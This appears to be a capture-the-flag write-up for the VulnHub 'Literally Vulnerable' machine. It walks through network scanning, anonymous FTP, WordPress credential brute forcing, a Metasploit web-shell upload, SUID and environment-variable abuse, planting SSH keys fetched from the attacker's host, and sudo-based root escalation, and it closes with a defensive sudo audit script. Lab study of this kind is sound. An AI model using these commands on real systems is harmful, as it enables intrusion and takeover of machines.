LiterallyVulnerable

2020-03-08 14:26 — 2020-03-09

Flags: 3 (local.txt, user.txt & root.txt)
Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)
Website: https://ebryx.com
Hint: Maybe, you hasted and left some open holes unchecked?
Literally Vulnerable is supposed to give beginners a taste of real-world scenarios and OSCP machines at the same time! It was inspired highly by the @DC series.

You're supposed to know the big three (EEEs) Enumeration, Exploitation & Escalation of pentesting to pwn the machine. The machine is supposed to be beginner-friendly and the difficulty level is Easy-Intermediate depending on your knowledge. You need to have enough information about Linux file types & permissions for privileges escalation.

Technical Information:
Just download, extract and load the .vmx file in VMware Workstation (tested on VMware Workstation 15.x.x)
The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically
Contact:
You can either contact me on twitter @syed__umar or linkedin (/in/syedumararfeen/) for hints!
There are three flags in the machine: local.txt, user.txt & root.txt. You're supposed to grab all three in order to completely pwn the machine. Hope you like the machine, best of luck! :)

I'll try my best to continue with the series!
--------
From : https://www.vulnhub.com/entry/ua-literally-vulnerable,407/
Kali: 172.16.252.129
Target: 172.16.252.1/24

Information gathering

Live hosts:

nmap -n -sn -T5 -v 172.16.252.1/24 | grep -B 1 "Host is up"

Target ports and services:

nmap -n -Pn -sV -O 172.16.252.131

PORT   STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.14.0 (Ubuntu)

All ports:

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 325 Dec 04 13:05 backupPasswords
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.252.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2f:26:5b:e6:ae:9a:c0:26:76:26:24:00:a7:37:e6:c1 (RSA)
| 256 79:c0:12:33:d6:6d:9a:bd:1f:11:aa:1c:39:1e:b8:95 (ECDSA)
|_ 256 83:27:d3:79:d0:8b:6a:2a:23:57:5b:3c:d7:b4:e5:60 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.3
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Not so Vulnerable – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open http
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Open ports: 21, 22, 80, 65535

Anonymous FTP login

FTP allows anonymous access and yields a handful of passwords whose purpose is unknown for now:

ftp-anon: Anonymous FTP login allowed (FTP code 230)
*$eGRIf7v38s&p7 
yP$*SV09YOrx7mY
GmceC&oOBtbnFCH
3!IZguT2piU8X$c
P&s%F1D4#KDBSeS
$EPid%J2L9LufO5
nD!mb*aHON&76&G
$*Ke7q2ko3tqoZo
SCb$I^gDDqE34fA
Ae%tM0XIWUMsCLp

Web directory enumeration

80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.3
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Not so Vulnerable – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open http
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Port 80: nginx + WordPress

Port 65535: Apache

The browser console shows many failed resource requests, and they are addressed to literally.vulnerable, so add a hosts entry for that name:

echo "172.16.252.131    literally.vulnerable" >> /etc/hosts

Scan port 65535 first and visit the results one by one; that turns up a phpcms page that asks for a password, so enumerate it with wpscan:

dirsearch.py -u "http://172.16.252.131:65535" -e php --random-agents -w /usr/share/wordlists/dirb/big.txt

wpscan --url http://172.16.252.131:65535/phpcms/ --enumerate
[+] maybeadmin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
[+] notadmin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)

That gives two usernames. Trying the passwords obtained earlier against them, with some luck, yields one valid combination:

wpscan --url http://172.16.252.131:65535/phpcms/ -U users.txt -P backupPasswords
[i] Valid Combinations Found:
| Username: maybeadmin, Password:$EPid%J2L9LufO5

Logging into the WordPress admin panel

After going through everything in the back end, another username and password pair turns up:

notadmin:Pa$$w0rd13!&

Getting a shell (Getshell)

Upload a web shell through MSF to get a shell, using this module:

exploit/unix/webapp/wp_admin_shell_upload

Information gathering

meterpreter > sysinfo
Computer : literallyvulnerable
OS : Linux literallyvulnerable 4.15.0-88-generic #88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter >

######## lsb_release #############
www-data@literallyvulnerable:$ lsb_release -a lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.3 LTS
Release: 18.04
Codename: bionic

####### /etc/passwd #######
doe:x:1001:1001:Doe,,,:/home/doe:/bin/bash
john:x:1000:1000:,,,:/home/john:/bin/bash

Search for SUID binaries; a suspicious file turns up: itseasy

find / -perm -u=s -type f 2>/dev/null

Privilege escalation (user)

Running itseasy prints the absolute path of the current directory. I had read a write-up on escalating privileges by manipulating the PATH value, so I suspected the program calls the pwd command:

cd /tmp
cp /bin/bash /tmp/pwd # or echo "/bin/bash" > /tmp/pwd
chmod 777 /tmp/pwd
export PATH=/tmp:$PATH

After running it, the expected result did not appear.

Disassembling it with objdump -d shows a call to getenv, which reads environment variables.

So the program can be controlled by changing the value of an environment variable:

export PWD=\$\(/bin/bash\)

After that, commands no longer echo any output, so switch straight to SSH: generate an SSH key pair on Kali and upload the public key to the target:

cd /home/john/.ssh && wget http://172.16.252.129:8848/authorized_keys

Information gathering

A base64-encoded password is found in the home directory:

am9objpZWlckczhZNDlJQiNaWko= 
echo "am9objpZWlckczhZNDlJQiNaWko=" | base64 -d

john:YZW$s8Y49IB#ZZJ

Search for SUID programs:

find / -perm -u=s -type f 2>/dev/null
sudo passwd root
Sorry, user john is not allowed to execute '/usr/bin/passwd root' as root on literallyvulnerable.
sudo -l

Matching Defaults entries for john on literallyvulnerable:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on literallyvulnerable:
(root) /var/www/html/test.html

john can run /var/www/html/test.html as root.

Privilege escalation (root)

There is no test.html in /var/www/html, and john cannot write to the html directory, so switch back to the www-data user and create the file:

echo "/bin/bash" > test.html
chmod 777 test.html

Run it with sudo and the escalation to root succeeds.
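As an added example (not part of this write-up), a small sh audit that checks sudo command targets for the conditions the test.html rule above relied on: a missing file, a non-root owner, or write access for other users on the file or its parent directory. It assumes GNU coreutils (stat -c) on Linux; the sudo -l line it parses is constructed.

```shell
#!/bin/sh
# Audit one sudo command target. Prints "ok" or a ;-separated list of problems.
# Assumes GNU stat (-c) on Linux.
sudo_target_check() {
    target=$1
    problems=""
    if [ ! -e "$target" ]; then
        # An absent target is the worst case: whoever can create it owns the rule.
        problems="missing-target;"
    else
        owner=$(stat -c '%U' "$target")
        mode=$(stat -c '%a' "$target")
        [ "$owner" = "root" ] || problems="${problems}owner=$owner;"
        # octal mode digits: ... group other; bit 2 of each digit is the write bit
        grp=$(( mode / 10 % 10 )); oth=$(( mode % 10 ))
        [ $(( grp & 2 )) -eq 0 ] || problems="${problems}group-writable;"
        [ $(( oth & 2 )) -eq 0 ] || problems="${problems}world-writable;"
    fi
    # A writable parent directory lets a low-privileged user create or replace the file.
    dir=$(dirname "$target")
    dmode=$(stat -c '%a' "$dir" 2>/dev/null || echo 0)
    downer=$(stat -c '%U' "$dir" 2>/dev/null || echo unknown)
    [ "$downer" = "root" ] || problems="${problems}dir-owner=$downer;"
    dgrp=$(( dmode / 10 % 10 )); doth=$(( dmode % 10 ))
    [ $(( dgrp & 2 )) -eq 0 ] || problems="${problems}dir-group-writable;"
    [ $(( doth & 2 )) -eq 0 ] || problems="${problems}dir-world-writable;"
    printf '%s\n' "${problems:-ok}"
}

# Read "sudo -l" output on stdin, pick the absolute paths on "(user) ..." lines,
# and print "<path> <problems>" for each.
sudo_l_audit() {
    while read -r line; do
        case $line in
            "("*")"*)
                set -- $line
                shift   # drop the "(root)" runas spec; tags like NOPASSWD: are skipped below
                for tok in "$@"; do
                    case $tok in
                        /*) printf '%s %s\n' "$tok" "$(sudo_target_check "$tok")" ;;
                    esac
                done ;;
        esac
    done
}
```

Run it as `sudo -l | sudo_l_audit` on a host; any line that is not `ok` is a rule worth removing or pointing at a root-owned, non-writable script.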
